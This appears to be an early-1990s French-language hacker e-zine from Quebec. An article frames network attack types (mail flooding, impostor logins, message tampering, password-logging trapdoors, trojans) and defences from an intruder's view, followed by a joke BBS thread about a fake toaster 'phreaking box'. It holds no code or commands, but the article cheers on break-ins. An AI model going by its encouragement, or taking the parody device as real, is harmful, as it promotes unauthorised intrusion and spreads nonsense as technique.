ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Workstation
³
ÉÍÍØÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ³ Alexandria Data º
º ÛÛÛ T-1 Center º
º ³ ±±±±±± º
º ÀÄÄÄÄÄÄÄIJ²²²ÄÄÄÄÄÄÄı±±±±± º
º Host LAN Unisys A-11 º
º Connection º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


Nous avons eu de la chance de tomber sur ce syndicat, car le fait
qu'ils n‚gocient des conventions collectives … travers les USA
explique qu'il y avait trois nodes … leurs bureaux centraux. C'est
par l… que nous sommes rentr‚s <grin>.

Mais assez parl‚ des r‚seaux, car je vous connaŒt, bande d'obs‚d‚s:
vous d‚sirez tout simplement savoir comment les hacker! Pour ce
faire, mettez-vous cinq minutes dans la peau d'un op‚rateur, d'un
sysadmin, responsable d'un r‚seau de grande envergure. Vous avez
entre les mains une belle bˆte que le moindre microbe peut
terrasser. Apprenez d'abord … identifier vos ennemis... pour
connaŒtre vos vuln‚rabilit‚s. Vous ne voulez pas EMPECHER les gens
d'acc‚der au systŠme, bien au contraire. Sauf que ces usagers
doivent ob‚ir strictement au protocole d'accŠs que vous avez
instaur‚.

Si votre systŠme n'est connect‚ sur aucune ligne t‚l‚phonique
accessible de l'int‚rieur (comme plusieurs banques, les industries
de la d‚fense, etc), les possibilit‚s de d‚faillance sont
restreintes. Bris des composantes, pannes d'alimentation et
employ‚s fraudeurs sont vos seuls ennemis. On s'assure d'avoir des
systŠmes de backup et du hardware fiable pour contrecarrer les
effets de l'un, et on protŠge PHYSIQUEMENT l'accŠs aux terminaux
en enregistrant les usagers pour l'autre.

Si, par contre, on peut communiquer avec votre systŠme de
l'ext‚rieur, vous venez de vous compliquer la vie...


La premiŠre chose qu'un sysadmin va faire, tout comme le sysop de
n'importe lequel BBS qui se respecte, c'est de ne JAMAIS donner …
un utilisateur plus d'accŠs qu'il n'en a besoin. Si la hi‚rarchie
de votre politique d'accŠs exige que M. Untel puisse utiliser
exclusivement le traitement de textes et le chiffrier, vous ne lui
laisserez pas un accŠs superuser... C'est simple, non? Ce mˆme
accŠs de superuser, g‚n‚ralement reli‚ aux sysadmins, doit lui
aussi ˆtre prot‚g‚ de maniŠre … ce que les petits curieux ne
puissent pas avoir accŠs aux commandes de configuration du r‚seau.
Une autre v‚rit‚ qui relŠve de l'‚vidence, mais qui est parfois
oubli‚e...

Nous reviendrons plus tard aux m‚thodes de protection g‚n‚ralement
utilis‚es par les sysadmins qui ont du beat, mais revenons … la
case d‚part, c'est … dire … l'identification des problŠmes qui
peuvent subvenir sur un r‚seau, et qui n'impliquent pas le
hardware, le software ou l'alimentation. Il est bien entendu qu'une
attaque sur un r‚seau peut impliquer un m‚lange savamment dos‚ de
plusieurs de ces m‚thodes... Mettons de l'ordre dans nos id‚es...

1) Blocage d'accŠs: cette forme d'attaque se produit quand un
utilisateur, en rŠgle ou non, empˆche un ou plusieurs autres
utilisateurs du systŠme d'utiliser de maniŠre fonctionnelle leur
accŠs. Tous intrus sur un systŠme ‚quip‚ de E-mail, de poste
‚lectronique, devrait chercher de ce c“t‚ les moyens de, non
seulement lire le courrier des autres et le rediriger, mais de
s'arranger pour "emballer" la machine afin que le E-Mail soit
produit de fa‡on continue, engorgeant trŠs rapidement les systŠmes
avec des unit‚s de sauvegarde r‚duites, ce qui aura pour effet de
barrer le systŠme.

2) L'imposteur: Ciel, c'est nous, ‡…! Ben, ‡a s'explique vachement
bien, non? Tu as trouv‚ le code d'un usager en rŠgle, et tu
p‚nŠtres le r‚seau avec son accŠs...

3) Modification des messages: peut ˆtre r‚alis‚ par un intrus ou,
ce qui arrive g‚n‚ralement dans la plupart des cas, par un usager
en rŠgle. Le dernier m‚mo du service des d‚placements disait:
"Versez $ 800 … Paul Paroix pour son voyage, et d‚bitez le compte
de Paul Paroix". Quelle ne serait pas la surprise de ce cher Paul
si le message, aprŠs manipulation, disait: "Versez $ 800 … Pierre
Caheut pour son voyage, et d‚bitez le compte de Paul Paroix".

4) La trappe … souris: Une "trapdoor", comme on dit g‚n‚ralement en
bon fran‡ais, c'est un petit programme, import‚ d'un autre systŠme,
ou ‚crit sur le r‚seau, et qui modifie le programme d'acquisition
des mots de passe pour qu'… chaque fois que quelqu'un se logge sur
le r‚seau, le programme, en plus d'ex‚cuter la fonction
d'authentification de l'usager et d'enregistrement de son heure
d'accŠs (et toute cette sorte de chose), CRE un fichier SPCIAL o—
il note tous les noms et mots de passe. Le petit malin qui a ‚crit
cette trapdoor peut revenir plus tard et, grƒce … une ou deux
commandes bien choisies, r‚cup‚rer ce fichier secret. Le pactole,
les kids! C'est d'ailleurs grƒce … ce type de programme, de
trapdoors, que le Chaos Computer Club s'‚tait rendu c‚lŠbre, … la
fin des ann‚es 80. Plusieurs allemands, dont le c‚lŠbre Pengo,
avaient ainsi hack‚ les systŠmes de la NASA, jusqu'… l'os... et
avaient tent‚ de vendre le fruit de leur labeur … l'Allemagne de
l'Est...

5) Trojan: Pour ceux qui viennent de se joindre … nous, et qui ne
sauraient pas ce

  
qu'est un trojan, il s'agit d'une marque de
condoms... Ha! Et si vous croyez cela, vous ˆtes peut-ˆtre mieux de
fermer ce magazine et d'aller acheter ALLO-POLICE...


C'est ‡a qui est ‡a... Ce sont les cinq dangers qui, en gros,
menacent les r‚seaux. Plus pr‚cis‚ment, les cinq dangers RECENSS
par les constructeurs de r‚seaux. Toute autre forme d'attaque que
vous pourriez concevoir couperait dans leurs s‚curit‚s comme dans
du beurre. En passant, si vous devisez une nouvelle tactique,
contactez-nous! Si vous trouvez, par exemple, un moyen de a)
capturer le fichier encrypt‚ des users et de leur mot de passe, et
que B) vous connaissez l'algorithme d'encryptage, les sysadmin n'y
verront que du feu. Pourquoi? Parce qu'ils travaillent tous avec
leur bible, et que leur bible dit ceci et pas autre chose... Cette
bible s'appelle OPEN SYSTEMS INTERCONNECTION REFERENCE MODEL
(OSIRM), addenda 2 de OSIRM (ISO 7498-2), publi‚e en 1989. La bible
est formelle, les kids, elle ne reconnait que ces 5 types
d'attaques, et ne propose des r‚ponses strat‚giques qu'… ces
attaques seulement. Et encore, ‡a s'adresse UNIQUEMENT aux
sysadmins qui savent lire! Parce que... comment vous dire... des
r‚seaux qui appliquent les mesures de s‚curit‚ qui vont suivre,
conform‚ment aux recommandations de la bible, il n'y en a pas des
chars. N'est-ce pas, Coaxial? ;-)

LES CINQ MESURES DE SCURIT DES RSEAUX

Les cinq r‚ponses propos‚es aux sysadmins se r‚sument en quelques
mots:

-authentification de l'usager
-contr“le des niveaux d'accŠs
-confidentialit‚ des donn‚es
-v‚rification de l'int‚grit‚ des fichiers
-authentification de la date d'originale des fichiers

Et autour de cela, il y a plein de mesures effectives qui se
greffent, pour palier … toutes les ‚ventualit‚s que les
‚crivaillons de la bible ont imagin‚. Ces mesures sont, dans
l'ordre et dans le d‚sordre...

ENCRYPTAGE

The SubHuman Punisher, lou‚ soit son handle, nous pr‚pare pour le
mois prochain un texte plut“t fouill‚ sur la question (probablement
un rip d'un T-file serbo-croate traduit du latin ancien, s'il faut
en croire les l‚gumes qui font office de d‚tracteurs de NPC). Je ne
tenterai pas de surench‚rir sur cet ouvrage qui fera date, et me
contenterai donc de d‚signer plut“t les niveaux o— l'encryptage
devrait avoir sa place. Besides, ‡a va ˆtre moins compliqu‚ pour
moi ;-) L'encryption devrait, dans un systŠme qui se veut
s‚curitaire, avoir lieu au moment de l'archivage des donn‚es, donc
sur les fichiers mˆmes, et au niveau de la transmission elle-mˆme
des donn‚es sur le r‚seau ainsi que sur les fils du t‚l‚phone.

CONTROLE DE L'ACCES

A) Listes des capacit‚s d'un usager: c'est l'‚quivalent de la
liste des usagers que les sysops de babs connaissent bien. A chaque
commande d'un usager, le programme v‚rifie si l'usager en question
est autoris‚ … utiliser cette commande.

B) Mots de passe: L'utilisation de mots de passe par les usagers...
bof, vous ˆtes capables de deviner celle-l…, non? Si il y a une
chose que je d‚teste, c'est ‚crire pour ne rien dire... Ceci dit,
la fucking bible des sysadmins conseille de multiplier les niveaux
de mots de passe. Id‚alement, il faudrait qu'un usager soit appel‚
… entrer un mot de passe … chaque commande qu'il fait. Ca serait
pratique d'abord!

C) Liste de contr“le d'accŠs: Comme sur les babs, encore une fois,
le systŠme v‚rifie si un usager … accŠs … ce r‚seau.

VRIFICATION DE L'INTGRIT DES FICHIERS

On parle ici de beaucoup plus que la v‚rification habituelle des
fichiers upload‚s sur un bab, en ce sens que les fichiers sont
analys‚s, pour savoir s'ils contiennent des virus, certes, mais
aussi afin de savoir si, d'un jour … l'autre (la bible recommande
des inspections quotidiennes du contenu du systŠme), la taille des
fichiers ou leur date originelle n'a pas ‚t‚ modifi‚e, ce qui
indiquerait la pr‚sence d'un trojan ou d'un trapdoor.

MODIFICATION DES ROUTES DE DONNES

Pour les r‚seaux VRAIMENT pouss‚s, et j'entends par l… les systŠmes
qui contiennent des donn‚es, comme on dit, cruciales, il existe
aussi la modification des routes de donn‚es. Ca consiste en gros …
ne jamais utiliser deux fois de suite les mˆmes lignes et le mˆme
r‚seau de communication … chaque fois que des packets voyagent. Les
compagnies propri‚taires de leurs lignes data peuvent, par exemple,
transf‚rer d'un trunk … l'autre le flot des donn‚es, pour fucker
ceux qui seraient directement branch‚s sur la ligne de
transmission. Encore l…, ce genre d'arrangement est plut“t
sophistiqu‚, si vous voulez mon avis. Mais il est utilis‚: les
caisses Desjardins, par exemple, sont PROPRITAIRES de trois cƒbles
de fibre optique qui relient les bureaux de Montr‚al et ceux du
siŠge social de L‚vis. Et c'est sans parler des backups. Le Bell
gŠre trois Datapak optiques, exclusifs … Desjardins, au cas o— le
premier systŠme ferait d‚faut. Et comme si ce n'‚tait pas assez,
Desjardins loue une ligne satellite … T‚l‚com Canada... C'est ce
qui s'appelle pr‚voir pour le pire, les petits gars...


LES TRUCS CARRMENT FARFELUS

Vous avez d‚j… entendu parler des vibrations capt‚es sur les
fenˆtres avec des faisceaux lasers? Pour r‚sumer (et c'est bien
parce que le prochain James Bond n'est pas pour demain: que fait
Brocoli?), lorsque quelqu'un parle dans une piŠce, il ‚met des
vibrations. Si il y a par exemple une fenˆtre dans la piŠce, celle-
ci va vibrer au son de la voix, de la musique, etc... Un faisceau
laser braqu‚ sur ladite fenˆtre peut, avec l'‚quipement appropri‚,
‚valuer … distance les vibrations de la fenˆtre, et restituer ce
qui se dit dans la piŠce. P‚t‚, quand mˆme... Comme dirait Mental
Floss, il y a du monde de pas mal rong‚...


Et c'est tout!


C'est tout ce qu'ils ont invent‚ pour prot‚ger leurs r‚seaux! Ils
ne sont mˆme pas foutus, pour les appels ext‚rieurs, d'instaurer
une proc‚dure standard de rappel automatique (comme les valideuses
des babs). Il y a bien quelques compagnies qui tentent de pousser
l'instauration de cl‚s-codes (une cl‚-code, c'est un bidule
‚lectronique qui ‚met un signal que le node du r‚seau re‡oit, et
qui authentifie l'usager. Si l'ordi de la personne qui communique
ne possŠde pas la bonne cl‚ ‚lectronique, le logon ne fonctionne
pas), mais l'instauration de telles mesures sur tous les systŠmes
n'est pas pour demain. Et puis, chaque offensive des sysadmins pour
nous chasser comporte sa parade... Des systŠmes, pour peu que vous
hackiez un tant soit peu, vous allez en rencontrer. Et vous allez
vous apercevoir que la quasi-majorit‚ des r‚seaux n'est pas foutue
d'appliquer des rŠgles de s‚curit‚ ‚l‚mentaires... Remarquez, les
sysadmins sont des ˆtres humains, aprŠs tout. Ils sont bien souvent
trop peu pour le nombre d'appareils qu'ils doivent superviser. Et
qui plus est, la majorit‚ du temps qu'ils pourraient consacrer … la
protection de leurs systŠmes est en r‚alit‚ consacr‚e … aller
d‚panner la secr‚taire du boss qui est gel‚e dans Word Perfect, ou
le petit cadre … la comptabilit‚ qui ne trouve plus son escape key.
Quand tu passes ton temps … ‚teindre des incendies, comment veux-tu
trouver le temps d'installer un d‚tecteur de fum‚e? Pas que ca
servirait … grand chose, remarquez. Il n'y a pas de systŠme qui ne
peut ˆtre craqu‚ par un pirate poss‚dant les bons outils (HADES me
vient … l'esprit) et un minimum de connaissances...


Hasta la vista, les pros!



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

MERCI D'ABUSER DE L'INTERURBAIN BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



MEUNIER, TU DORS, TON MOULIN VA TROP VITE...

La Bread Box

par
-=ThE PoSSe=-


Ok les mecs... voici un petit log d'un ‚change, avec The Subhuman
Punisher et Atreid Bevatron dans les r“les principaux, ainsi que
Blitzkreig et Mental Floss comme figurants. Tout ce qui suit a ‚t‚
captur‚ sur "The HelloweeN BoarD", un BBS "renomm‚" de 418, avec au
moins un "LD", (un appeleur de 305/Miami), Toxic Threat pour ne pas
le nommer. La pr‚sence de cet am‚ricain fait d'ailleurs que le
sysop EXIGE de tous que les messages soient ‚crits en anglais...

Ce qui a parti le bal, c'est un message de Crime Lord dans lequel
il demandait "Does anyone knows how to hack the new payfones". Il
parlait bien sur des nouveaux bolides du Bell, les Milleniums, ces
nouveaux t‚l‚phones publics qui acceptent les cartes de cr‚dit...A
partir de l…, ‡a a d‚g‚n‚r‚, et NPC est fier de vous pr‚senter la
Weston Box, a/k/a la Bread Box...

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


[Message]: 15 of 96
[When ]: 1/1/92 At 4:19 pm
[Subject]: New PayPhone [Reply #2]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>

Ever heard about COCOTs ? Customer-Owned Coin Operated Telephone?
Those can be hacked. Anyway.

BTW, did i tell you how i hacked my toaster? Great! All you need is
WESTON white bread and a toaster. First, buy a 864565 OHmz crystal,
2,5 watts condensators, and some alligator clips (with some wires).
Plug the clips into the condensators, one end on the crust, the
other in the right slot of the toaster, condensators in the middle.
Upwire the crystal upside down on the flipped side of the backward
toaster (still following?), and do a 360ø rotation on the Y axis of
the bread. Don't care 'bout the grains falling. Then plug your
alligators on another slice, and mix the two slices. Here's an
awesome schema showing what your new WESTON BOX will look like...

/~~~~~\ ____/~ø\~~~~\~~~~\
o--\+~X_/ \ . \ . \
\ / \ \ . \ . \
 /___\ \______ \ . \ . \-----<~~~~~\
\ \____\____\ . .
\ _ \ . /
\_ /_____\
\_________

You now have modified your toaster so that it could grill 4 bread
slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
that!!!! If you plug the alligators on your phone line, you will
get free calls everywhere in the WORLD!!!! So now you can call
everywhere for free, and grill 4 slice of breads at the same
time!!!! Fantastic eh?

Till later bud!
TSP

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

[Message]: 18 of 96
[When ]: 1/1/92 At 5:20 pm
[Subject]: New PayPhone [Reply #3]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>


> BTW, did i tell you how i hacked my toaster? Great! All you need
> is WESTON white bread and a toaster.

I don't buy WESTON bread... Is that OK with some Multi-Mark?

> and do a 360ø rotation on the Y axis of the bread.

Well... I think it's surely not a 360 rotation... probably a 40,56
rotation on the X axis of the bread... With a 360 on the Y, you'll
burn your bread everytime..... and when you'll try to call, they
will be able to trace you... but not with a 40,56 on the X...

> /~~~~~\ ____/~ø\~~~~\~~~~\
> o--\+~X_/ \ . \ . \
> \ / \ \ . \ . \
>  /___\ \______ \ . \ . \-----<~~~~~\
> \ \____\____\ . .
> \ _ \ . /
> \_ /_____\
> \_________

Yeah!!! NOW, I know what you're talking about!


>You now have modified your toaster so that it could grill 4 bread
>slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
>that!!!! If you plug the alligators on your phone line, you will
>get free calls everywhere in thw WORLD!!!! So now you can call
>everywhere for free, and grill 4 slice of breads at the same
>time!!!! Fantastic eh?

WHAT?!?! Is that possible? You mean that you can CALL EVERYWhere in
the world AND grill some bread AT THE SAME TIME?!?? Well... You
surely have the new brand of CPU... I've only a 6478HarQ in MY
toaster... It's quite poor in multi-tasking... You probably have a
6878HarT... Those are newer and really better!! But... I've a
question... :

What do you have to do when you want to hang-up the phone? You take
the bread off?? It could be good to put a switch or something...

Well... I'm working on some ARTIFICIAL bread for your board... I'll
give you all the news about that...

Did you ever tried that with a steak? Pretty cool...

Later moron... ;)

AtrEiD

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


[Message]: 23 of 96
[When ]: 1/1/92 At 10:33 pm
[Subject]: New PayPhone [Reply #4]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>

ĵ > BTW, did i tell you how i hacked my toaster? Great! All you
need
ĵ > is WESTON white bread and a toaster.
ĵ
ĵI don't buy WESTON bread... Is that OK with some Multi-Mark?

No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I
should introduce you to a Weston bread party! All you need is a
6-pack of Weston and peanut butter. Pretty cool.

ĵ > and do a 360ø rotation
ĵ >on the Y axis of the bread.
ĵ
ĵWell... I think it's surely not a 360 rotation... propably a
40,56 rotation
ĵon the X axis of the bread... With a 360 on the Y, you'll burn
your bread
ĵeverytime..... and when you'll try to call, they will be able to
trace
ĵyou... but not with a 40,56 on the X...

Maybe... but that way, you could'nt call an inward operator.
Anyway, ANI/ESS is not yet implemented on the BreadLines, so why
bother covering your ass?

AB> > /~~~~~\ ____/~ø\~~~~\~~~~\
AB> > o--\+~X_/ \ . \ . \
AB> > \ / \ \ . \ . \
AB> >  /___\ \______ \ . \ . \-----<~~~~~\
AB> > \ \____\____\ . .
AB> > \ _ \ . /
AB> > \_ /_____\
AB> > \_________
AB>
AB> Yeah!!! NOW, I know what you're talking about!

Hope you do. But I will get out the IMPROVED WESTON BOX in the
near future. Look for it, I will include GIFs.

ĵ >You now have modified your toaster so that it could grill 4
bread
ĵ >slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
ĵ >that!!!! if you plug the alligators on your phone line, you
will
ĵ >get free calls everywhere in thw WORLD!!!! So now you can call
ĵ >everywhere for free, and grill 4 slice of breads at the same
ĵ >time!!!! fantastic !
ĵ
ĵWHAT?!?! Is that possible? You mean that you can CALL EVERYWhere
in the
ĵworld AND grill some bread AT THE SAME TIME?!?? Well... You
surely have the
ĵnew brand of CPU... I've only a 6478HarQ in MY toaster... It's
quite poor in
ĵmulti-tasking... You probably have a 6878HarT... Those a newer
and really

Yeah!!!!#%$ k-rad isn't it? I have a 6578HarQ... but your trouble
is e-z to solve; get a 806358P2H3P grill accelerator. And if it
isn't enuff, get a 6479GarQ co-processor.

ĵWhat do you have to do when you want to hang-up the phone? You
take the
ĵbread off?? That could be good to put a switch or something...

If you'd have half-a-brain, you would have figured out that the
GRiLL control Panel is similar to the AT command set.

ĵDid you ever tried that with a steak? Pretty cool...

No i didn't... But i think that you just have to take a BB-Q grill
instead of a toaster ?! I'd suggest a T-Bone, cause they have a
voltage control panel included.

Till later, fuckface!
TSP

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

[Message]: 30 of 96
[When ]: 12/31/199 At 7:05 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>

>No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I
>should introduce you to a weston bread party! All you need is a
>6-pack of weston and peanut butter. pretty cool.

Are you really sure of that??? Humm... Kinda strange... But I'm
really interested about the weston bread party... that could be
"MeGA-C0oL"!! But... I don't like peanut butter... May I just buy
some jam?

>ĵWell... I think it's surely not a 360 rotation... propably a
40,56
>ĵon the X axis of the bread... With a 360 on the Y, you'll burn
you
>ĵeverytime..... and when you'll try to call, they will be able
to t
>ĵyou... but not with a 40,56 on the X...
>
>Maybe... but that way, you couldn't call an inward operator.
Anyway,
>ANI/ESS is not yet implemented on the BreadLines, so why bother
>covering your ass?

Did you ever try to use a Jam Box with your Weston Box? With that,
you'll be able to use your 2 boxes as if they are a "Phone of the
future"...

>Yeah!!! NOW, I know what you're talking about!
>
> Hope you do. But I will get out the IMPROVED WESTON BOX in the
>near future. Look for it, I will include GIFs.

What do you think about a EGA/VGA interface? I can do that for U...
since you've found a new way to the phreaking life!

>Yeah!!!!#%$ k-rad itsnt it? I have a 6578HarQ... but your trouble
>is e-z to solve; get a 806358P2H3P grill accelerator. And if
itsnt
>enuff, get a 6479GarQ co-processor.

Humm... I've a friend with an Amiga... He has the VIDEO TOASTER
card... is that good for your Weston Box? I've heard a lot about
it...

>If you'd have half-a-brain, you would have figured out that the
>GRiLL control Panel is similar to the AT command set.

Gimme the string to configure my Bread... is that :

BREAD GRILL 4441919 TOAST BEACON EGG

or

BREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST

I can't figure it out...

>No i didnt... But i think that you just have to take a BB-Q grill
>instead of a toaster ?! I'd suggest a T-Bone, cause they have a
>voltage control panel included.

My BBQ grill is out of date.... I mean... it doesn't work with
gaz... I've an old Charcoal BBQ... That could be a waste of
charcoal... and if BELL or the COPs see the smoke.... ooohh....
they will know I'm a phreaker....

Later, G0D of Phreak!

AtrEiD

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

[Message]: 33 of 96
[When ]: 12/31/199 At 8:13 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: Blitzkreig <Level 35> <NpC EDiTOR>


Yo! I've tried your shit with a Pop Tarts in my toaster... K-RaD!
I got meself full control on the two canadian satellites. Actually,
Anik is, by my own command, beeming lots of microwaves to your
house... Don't you smell something burning? Your brain perhaps?

---=BlItZkReIg=---


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


[Message]: 36 of 96
[When ]: 12/31/199 At 9:12 pm
[Subject]: New PayPhone [Reply #6]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>

ĵ >Maybe... but that way, you couldn't call an inward operator.
Anyway,
ĵ >ANI/ESS is not yet implemented on the BreadLines, so why bother
ĵ >covering your ass?
ĵ
ĵDid you ever try to use a Jam Box with your Weston Box? With
that, you'll be
ĵable to use your 2 boxes as if they are a "Phone of the
future"...

Yeah... i've already thought about that. But i soon found out that
a Lunch Box is way more than a Jam Box; cause it have all the jam's
advantages, and it is pectine free!

ĵ > Hope you do. But I will get out the IMPROVED WESTON BOX in the
ĵ >near future. Look for it, I will include GIFs.
ĵ
ĵWhat do you think about a ega/vga interface? I can do that for
U... since
ĵyou've found a new way to the phreaking life!

Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker
support and mega-kewl ASCIi grfx!

ĵ >If you'd have half-a-brain, you would have figured out that the
ĵ >GRiLL control Panel is similar to the AT command set.
ĵ
ĵGimme the string to configure my Bread... is that :
ĵ
ĵBREAD GRILL 4441919 TOAST BEACON EGG
ĵ
ĵor
ĵ
ĵBREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST
ĵ
ĵI can't figure it out...

Mine is:
Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am now
working on a bread box that would act like a phone directory.

ĵMy BBQ grill is out of date.... I mean... it doesn't work with
gaz... I've
ĵan old Charcoal BBQ... That could be a waste of charcoal... and
if BELL or
ĵthe COPs see the smoke.... ooohh.... they will know I'm a
phreaker....

And you'll be toasted...

Later, Elite d00d.
TSP

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


[Message]: 40 of 96
[When ]: 12/17/187 At 6:11 pm
[Subject]: New PayPhone [Reply #7]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>


>Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker
>support and mega-kewl ASCIi grfx!

Yeah like the Lancelot magazine... as good as it... ;-)

>Mine is:
>Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am
now
>working on a bread box that would act like a phone directory.

Hey! This stuff is not legal!!!! If you do that, you'll be a
criminal, SO STOP NOW or BELL will put you in jail!

> µMy BBQ grill is out of date.... I mean... it doesn't work with
gaz..
> ĵan old Charcoal BBQ... That could be a waste of charcoal...
and if B
> ĵthe COPs see the smoke.... ooohh.... they will know I'm a
phreaker..
>
> And you'll be toasted...

DEAD burn... ;-)

AtrEiD


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


[Message]: 41 of 96
[When ]: 10/9/146 At 6:34 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: Mental Floss <Level 50> <NpC MeMBeR>

TSP> introduce you to a weston bread party! All you need is a
TSP> 6-pack of weston and peanut butter. pretty cool.

Nah man, you're wrong... for a Weston party..you need to come with
a yellow electric guitar (without the case, quite important)...
Invite some of your long-hairs friends...and together put peanut
butter on some slide when watchin MUSIC PLUS... pretty cool party
uh?

And remember...
Weston, your generation's favorite...
...ask for it by name...

later

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Eh oui... d‚j… termin‚....


-L'eau guŠde baille Subhuman Punisher fort Fonne Ouique One Laine-



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

MERCI DE SWITCHER A UNITEL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




IL FAUT RENDRE A CSAR CE QUI APPARTIENT A CSAR
ou
OUVREZ LES PORTES, QUE L'ON RESPIRE!

par

THX 1138

Mental Floss et Blitzkreig m'ont dit que ce num‚ro, le 4, ‚tait
consacr‚ au thŠme "AYEZ UNE CONSCIENCE SOCIALE".
"THX, m'ont-ils dit, il y a des gens qui te trouvent trop heavy. Tu
passes pour un psychopathe aux yeux de certains. Fait preuve de
civisme. Comme les scouts, tiens: fais donc une bonne action envers
